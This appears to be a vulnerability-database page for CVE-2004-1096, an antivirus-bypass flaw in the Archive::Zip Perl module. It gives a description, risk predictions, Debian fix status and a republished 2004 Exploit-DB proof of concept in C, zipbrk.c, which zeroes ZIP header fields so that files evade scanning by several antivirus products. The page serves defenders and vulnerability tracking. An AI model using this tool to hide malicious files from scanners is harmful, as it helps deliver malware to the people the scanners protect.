VIR Vulnerability Intelligence Relay

CVE-2004-1096

unknown
Published — · Modified —
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
1.0

Description

Archive::Zip Perl module before 1.14, when used by antivirus programs such as amavisd-new, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-629 local multiple verified text · 3 KB
oc192 · 2004-11-14

Multiple AntiVirus - '.zip' Detection Bypass

text exploit Source: Exploit-DB 
/*
zipbrk.c - Proof-of-Concept for CAN-2004-0932 - CAN-2004-0937
Copyright (C) 2004 oc.192

This program is free software; you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not,
write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

oc.192 phreaker net
*/
#include <stdio.h>
#include <stdlib.h>

unsigned short LOCAL_HEADER_OFFSET = 16;
unsigned short CENTRAL_HEADER_OFFSET = 18;
unsigned long DATA_REPLACE_VALUE = 0x00000000;

void show_usage()
{
printf("zipbrk - by oc.192 [oc.192@phreaker.net]\n");
printf("Attempts to utilize the vulnerabilities described in:\n");
printf("CAN-2004-0932 - McAfee\nCAN-2004-0933 - Computer Associates\n"
"CAN-2004-0934 - Kaspersky\nCAN-2004-0937 - Sophos\n"
"CAN-2004-0935 - Eset\nCAN-2004-0936 - RAV\n\n");
printf(" Usage: zipbrk <zip_file>\n");
}

void patch_file(FILE *hfile, unsigned long offset)
{
char *buffer = malloc(1);

memset(buffer, 0, 1);
fseek(hfile, offset, SEEK_SET);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
free(buffer);
}

void scan_file(char *filename)
{
FILE *hfile;
unsigned char buffer;
unsigned long offset = 0;

if ((hfile = fopen(filename, "rb+")) == NULL)
{
printf("[-] Error: Unable to open %s", filename);
return;
}
printf("[+] Scanning %s ...\n", filename);

while (fread(&buffer, sizeof(buffer), 1, hfile))
{
if (buffer == 0x50)
{
fread(&buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x4B)
{
fread(&buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x01)
{
fread(&buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x02)
{
/* perform write */
offset = ftell(hfile);
offset = offset + LOCAL_HEADER_OFFSET;
printf(" [-] Writing local header patch [0x%.8X]\n", offset);
patch_file(hfile, offset);
fseek(hfile, offset, SEEK_SET);
}
}
else if (buffer == 0x03)
{
fread(&buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x04)
{
/* perform write */
offset = ftell(hfile);
offset = offset + CENTRAL_HEADER_OFFSET;
printf(" [-] Writing central header patch [0x%.8X]\n", offset);
patch_file(hfile, offset);
fseek(hfile, offset, SEEK_SET);
}
}
}
}
}
printf("[+] File scanning finished. EOF:%d ERR:%d\n", feof(hfile), ferror(hfile));
fclose(hfile);
}

int main(int argc, char *argv[])
{
if (argc != 2)
{
show_usage();
return 0;
}

if (!strcmp(argv[1], "-h") || !strcmp(argv[1], "/?"))
{
show_usage();
return 0;
}

scan_file(argv[1]);

return 0;
}

// milw0rm.com [2004-11-14]

OS impact
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 1.14-1
sid Fixed 1.14-1
forky Fixed 1.14-1
bullseye Fixed 1.14-1
bookworm Fixed 1.14-1

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.